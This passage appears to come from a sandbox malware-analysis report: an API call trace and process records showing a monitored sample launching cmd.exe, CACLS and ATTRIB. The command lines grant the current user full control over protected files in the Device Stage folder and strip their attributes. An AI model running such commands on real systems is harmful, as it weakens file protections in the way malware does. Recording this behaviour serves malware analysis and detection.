[0148.538] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0148.538] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0148.543] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0148.543] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0148.543] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0148.543] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0148.543] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0148.543] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0148.543] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0148.548] SetErrorMode (uMode=0x0) returned 0x0 [0148.549] SetErrorMode (uMode=0x1) returned 0x0 [0148.549] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x222010, lpFilePart=0x1ef244 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef244*="Desktop") returned 0x18 [0148.549] SetErrorMode (uMode=0x0) returned 0x1 [0148.549] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0148.549] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0148.554] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0148.555] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0xffffffff [0148.555] GetLastError () returned 0x2 [0148.555] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0xffffffff [0148.555] GetLastError () returned 0x2 [0148.555] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0x210f48 [0148.556] FindClose (in: hFindFile=0x210f48 | out: hFindFile=0x210f48) returned 1 [0148.556] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0xffffffff [0148.556] GetLastError () returned 0x2 [0148.556] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0x210f48 [0148.556] FindClose (in: hFindFile=0x210f48 | out: hFindFile=0x210f48) returned 1 [0148.556] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0148.556] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0148.556] GetConsoleTitleW (in: lpConsoleTitle=0x1ef4b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.556] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef340, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef408 | out: lpAttributeList=0x1ef340, lpSize=0x1ef408) returned 1 [0148.556] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef340, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef400, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef340, lpPreviousValue=0x0) returned 1 [0148.556] GetStartupInfoW (in: lpStartupInfo=0x1ef2fc | out: lpStartupInfo=0x1ef2fc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0148.557] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0148.558] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1ef39c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef3e8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1ef3e8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbb8, dwThreadId=0xb9c)) returned 1 [0148.561] CloseHandle (hObject=0x4c) returned 1 [0148.561] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0148.561] GetEnvironmentStringsW () returned 0x2204d8* [0148.562] FreeEnvironmentStringsW (penv=0x2204d8) returned 1 [0148.562] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0148.603] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1ef2dc | out: lpExitCode=0x1ef2dc*=0x0) returned 1 [0148.603] CloseHandle (hObject=0x50) returned 1 [0148.603] _vsnwprintf (in: _Buffer=0x1ef424, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef2e8 | out: _Buffer="00000000") returned 8 [0148.603] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0148.603] GetEnvironmentStringsW () returned 0x2222f8* [0148.603] FreeEnvironmentStringsW (penv=0x2222f8) returned 1 [0148.603] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0148.604] GetEnvironmentStringsW () returned 0x2222f8* [0148.604] FreeEnvironmentStringsW (penv=0x2222f8) returned 1 [0148.604] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef340 | out: lpAttributeList=0x1ef340) [0148.604] GetConsoleTitleW (in: lpConsoleTitle=0x1ef724, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.604] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0148.604] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0148.604] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0148.604] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0xffffffff [0148.605] GetLastError () returned 0x2 [0148.605] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0xffffffff [0148.605] GetLastError () returned 0x2 [0148.605] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0x210f48 [0148.605] FindClose (in: hFindFile=0x210f48 | out: hFindFile=0x210f48) returned 1 [0148.605] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0xffffffff [0148.605] GetLastError () returned 0x2 [0148.605] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0x210f48 [0148.605] FindClose (in: hFindFile=0x210f48 | out: hFindFile=0x210f48) returned 1 [0148.606] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0148.606] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0148.606] GetConsoleTitleW (in: lpConsoleTitle=0x1ef4b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.606] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef340, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef408 | out: lpAttributeList=0x1ef340, lpSize=0x1ef408) returned 1 [0148.606] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef340, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef400, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef340, lpPreviousValue=0x0) returned 1 [0148.606] GetStartupInfoW (in: lpStartupInfo=0x1ef2fc | out: lpStartupInfo=0x1ef2fc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0148.606] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0148.606] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1ef39c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef3e8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"", lpProcessInformation=0x1ef3e8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb90, dwThreadId=0xc0c)) returned 1 [0148.608] CloseHandle (hObject=0x50) returned 1 [0148.608] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0148.608] GetEnvironmentStringsW () returned 0x222458* [0148.608] FreeEnvironmentStringsW (penv=0x222458) returned 1 [0148.608] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0148.771] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1ef2dc | out: lpExitCode=0x1ef2dc*=0x0) returned 1 [0148.772] CloseHandle (hObject=0x4c) returned 1 [0148.772] _vsnwprintf (in: _Buffer=0x1ef424, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef2e8 | out: _Buffer="00000000") returned 8 [0148.772] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0148.772] GetEnvironmentStringsW () returned 0x222458* [0148.772] FreeEnvironmentStringsW (penv=0x222458) returned 1 [0148.772] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0148.772] GetEnvironmentStringsW () returned 0x222458* [0148.772] FreeEnvironmentStringsW (penv=0x222458) returned 1 [0148.772] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef340 | out: lpAttributeList=0x1ef340) [0148.772] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.772] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0148.772] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.772] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0148.772] _get_osfhandle (_FileHandle=0) returned 0x3 [0148.772] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0148.772] SetConsoleInputExeNameW () returned 0x1 [0148.772] GetConsoleOutputCP () returned 0x1b5 [0148.773] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0148.773] SetThreadUILanguage (LangId=0x0) returned 0x409 [0148.773] exit (_Code=0) Process: id = "222" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea167a0" os_pid = "0xbb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "221" os_parent_pid = "0xb3c" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18792 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18793 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18794 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18795 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 18796 start_va = 0x650000 end_va = 0x658fff entry_point = 0x650000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 18797 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18798 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18799 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18800 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 18801 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18802 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18803 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18804 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18805 start_va = 0x1b0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18806 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 18807 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18808 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18809 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18810 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18811 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18812 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18813 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 281 os_tid = 0xb9c Thread: id = 282 os_tid = 0xb40 Process: id = "223" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167a0" os_pid = "0xb90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "221" os_parent_pid = "0xb3c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18814 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18815 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18816 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18817 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 18818 start_va = 0xb40000 end_va = 0xb46fff entry_point = 0xb40000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 18819 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18820 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18821 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18822 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 18823 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18824 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18825 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18826 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18827 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 18828 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 18829 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 18830 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18831 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18832 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18833 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18834 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18835 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18836 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18837 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18838 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18839 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18840 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18841 start_va = 0x150000 end_va = 0x217fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 18842 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18843 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 283 os_tid = 0xc0c Process: id = "224" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xb00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18960 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18961 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18962 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18963 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 18964 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 18965 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18966 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18967 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18968 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 18969 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18970 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed 